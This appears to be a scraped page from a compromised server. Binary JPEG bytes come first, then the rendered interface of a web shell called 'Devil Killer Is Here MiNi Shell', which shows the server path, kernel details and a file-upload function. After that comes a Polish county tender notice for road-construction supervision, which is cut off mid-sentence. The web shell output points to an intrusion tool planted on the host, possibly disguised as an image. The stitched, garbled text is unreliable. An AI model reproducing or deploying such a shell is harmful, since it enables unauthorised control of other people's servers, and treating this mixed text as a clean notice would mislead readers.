JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240528/0034330301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji insp. nadz. inwestorskiego dla inwestycji pn.Modernizacja dróg powiatowych w Powiecie Lublinieckim wraz z zakupem niskoemisyjnego taboru transportowego na potrzeby SP ZOZ w Lublińcu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Lubliniecki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 152180843</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Paderewskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubliniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia-publiczne@lubliniec.starostwo.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lubliniec.starostwo.gov.pl/kontakt.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji insp. nadz. inwestorskiego dla inwestycji pn.Modernizacja dróg powiatowych w Powiecie Lublinieckim wraz z zakupem niskoemisyjnego taboru transportowego na potrzeby SP ZOZ w Lublińcu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-578822ba-1ce6-11ef-bfd3-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00343303</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00024904/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Pełnienie funkcji insp nadz inwestorskiego dla inwestycji pn. Modernizacja dróg powiatowych w Powiecie Lublinieckim wraz z zakupem niskoemisyjnego taboru transportowego na potrzeby SPZOZ w Lublińcu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzlubliniec.e-zp.finn.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzlubliniec.e-zp.finn.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia, komunikacja pomiędzy zamawiającym a wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej - Systemu FINN e-Zamówienia Publiczne Powiatu Lublinieckiego - dostępnego pod adresem - https://pzlubliniec.e-zp.finn.pl/ <br/>2)	Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się <br/>w rozdziale III podrozdziale 1 niniejszej SWZ. <br/>	Instrukcja korzystania z Systemu: https://pomoc.e-zp.finn.pl/<br/>3)	Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się <br/>z Instrukcją obsługi Systemu FINN e-Zamówienia Publiczne Powiatu Lublinieckiego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z postanowieniami SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z postanowieniami SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.272.14.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">10</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.:„Przebudowa odcinka drogi powiatowej nr 2333 S ul. Dębowa i ul. Kosmonautów w Strzebiniu polegająca na wzmocnieniu nawierzchni bitumicznej bez zmiany konstrukcji”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.:„Przebudowa odcinka drogi powiatowej nr 1020 S ul. Sportowa w Herbach polegająca na wzmocnieniu nawierzchni bitumicznej bez zmiany konstrukcji”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.:„Przebudowa odcinka drogi powiatowej nr 2315 S ul. Polna w Kochcicach polegająca na wzmocnieniu nawierzchni bitumicznej bez zmiany konstrukcji” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie 